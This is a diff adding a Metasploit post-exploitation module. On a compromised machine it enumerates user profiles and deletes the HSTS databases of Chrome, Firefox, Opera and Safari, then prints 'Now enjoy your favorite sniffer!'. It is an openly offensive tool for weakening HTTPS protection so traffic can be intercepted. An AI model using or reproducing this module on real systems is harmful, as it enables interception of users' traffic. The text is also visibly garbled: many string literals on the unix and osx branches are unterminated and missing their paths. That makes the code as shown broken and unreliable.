1+ ##
2+ # This module requires Metasploit: https://metasploit.com/download
3+ # Current source: https://github.com/rapid7/metasploit-framework
4+ ##
5+
6+ class MetasploitModule < Msf ::Post
7+ include Msf ::Post ::File
8+ include Msf ::Post ::Windows ::UserProfiles
9+ include Msf ::Post ::OSX ::System
10+ include Msf ::Post ::Unix
11+
12+ def initialize ( info = { } )
13+ super ( update_info ( info ,
14+ 'Name' => 'Web browsers HSTS entries eraser' ,
15+ 'Description' => %q{
16+ This module removes the HSTS database of the following web browsers: Mozilla Firefox,
17+ Google Chrome, Opera & Safari.
18+ } ,
19+ 'License' => MSF_LICENSE ,
20+ 'Author' =>
21+ [
22+ 'Sheila A. Berta (UnaPibaGeek)' , # ElevenPaths
23+ ] ,
24+ 'Platform' => %w( linux osx unix win ) ,
25+ 'References' =>
26+ [
27+ [ 'URL' , 'http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html' ] ,
28+ [ 'URL' , 'https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf' ]
29+
30+ ] ,
31+ 'SessionTypes' => %w( meterpreter shell )
32+ ) )
33+ end
34+
35+ def run
36+ profiles = user_profiles
37+
38+ profiles . each do |user_profile |
39+ account = user_profile [ 'UserName' ]
40+ browsers_hsts_db_path = { }
41+
42+ case session . platform
43+ when 'windows'
44+ browsers_hsts_db_path = {
45+ 'Chrome' => "#{ user_profile [ 'LocalAppData' ] } \\ Google\\ Chrome\\ User Data\\ Default\\ TransportSecurity" ,
46+ 'Firefox' => "#{ user_profile [ 'AppData' ] } \\ Mozilla\\ Firefox\\ Profiles" , #Just path for now
47+ 'Opera' => "#{ user_profile [ 'AppData' ] } \\ Opera Software\\ Opera Stable\\ TransportSecurity"
48+ }
49+ when 'unix' , 'linux'
50+ browsers_hsts_db_path = {
51+ 'Chrome' => "#{ user_profile [ 'LocalAppData' ] } ,
52+ 'Firefox' => "#{ user_profile [ 'LocalAppData' ] } , #Just path for now
53+ 'Opera' => "#{ user_profile [ 'LocalAppData' ] }
54+ }
55+ when 'osx'
56+ browsers_hsts_db_path = {
57+ 'Chrome' => "#{ user_profile [ 'LocalAppData' ] } ,
58+ 'Firefox' => "#{ user_profile [ 'LocalAppData' ] } , #Just path for now
59+ 'Opera' => "#{ user_profile [ 'LocalAppData' ] } ,
60+ 'Safari' => "#{ user_profile [ 'AppData' ] }
61+ }
62+ else
63+ print_error "Platform not recognized: #{ session . platform }
64+ end
65+
66+ browsers_hsts_db_path . each_pair do |browser , path |
67+ if browser == 'Firefox'
68+ hsts_db_path = [ ]
69+ if directory? ( path )
70+ files = dir ( path )
71+ files . reject! { |file | %w( . .. ) . include? ( file ) }
72+ files . each do |file_path |
73+ hsts_db_path . push ( [ path , file_path , 'SiteSecurityServiceState.txt' ] . join ( system_separator ) ) if file_path . match ( /.*\. default/ )
74+ end
75+ end
76+ path = hsts_db_path [ 0 ]
77+ end
78+ if !path . nil? and file? ( path )
79+ print_status "Removing #{ browser } #{ account }
80+ file_rm ( path )
81+ end
82+ end
83+ end
84+
85+ print_status "HSTS databases removed! Now enjoy your favorite sniffer! ;-)"
86+
87+ end
88+
89+ def user_profiles
90+ user_profiles = [ ]
91+ case session . platform
92+ when /unix|linux/
93+ user_names = dir ( "/home" )
94+ user_names . reject! { |u | %w( . .. ) . include? ( u ) }
95+ user_names . each do |user_name |
96+ user_profiles . push ( 'UserName' => user_name , "LocalAppData" => "/home/#{ user_name } )
97+ end
98+ when /osx/
99+ user_names = session . shell_command ( "ls /Users" ) . split
100+ user_names . reject! { |u | u == 'Shared' }
101+ user_names . each do |user_name |
102+ user_profiles . push (
103+ 'UserName' => user_name ,
104+ "AppData" => "/Users/#{ user_name } ,
105+ "LocalAppData" => "/Users/#{ user_name }
106+ )
107+ end
108+ when /windows/
109+ user_profiles |= grab_user_profiles
110+ else
111+ print_error "Error getting user profile data!"
112+ end
113+ user_profiles
114+ end
115+
116+ def system_separator
117+ return session . platform == 'windows' ? '\\' : '/'
118+ end
119+
120+ end
0 commit comments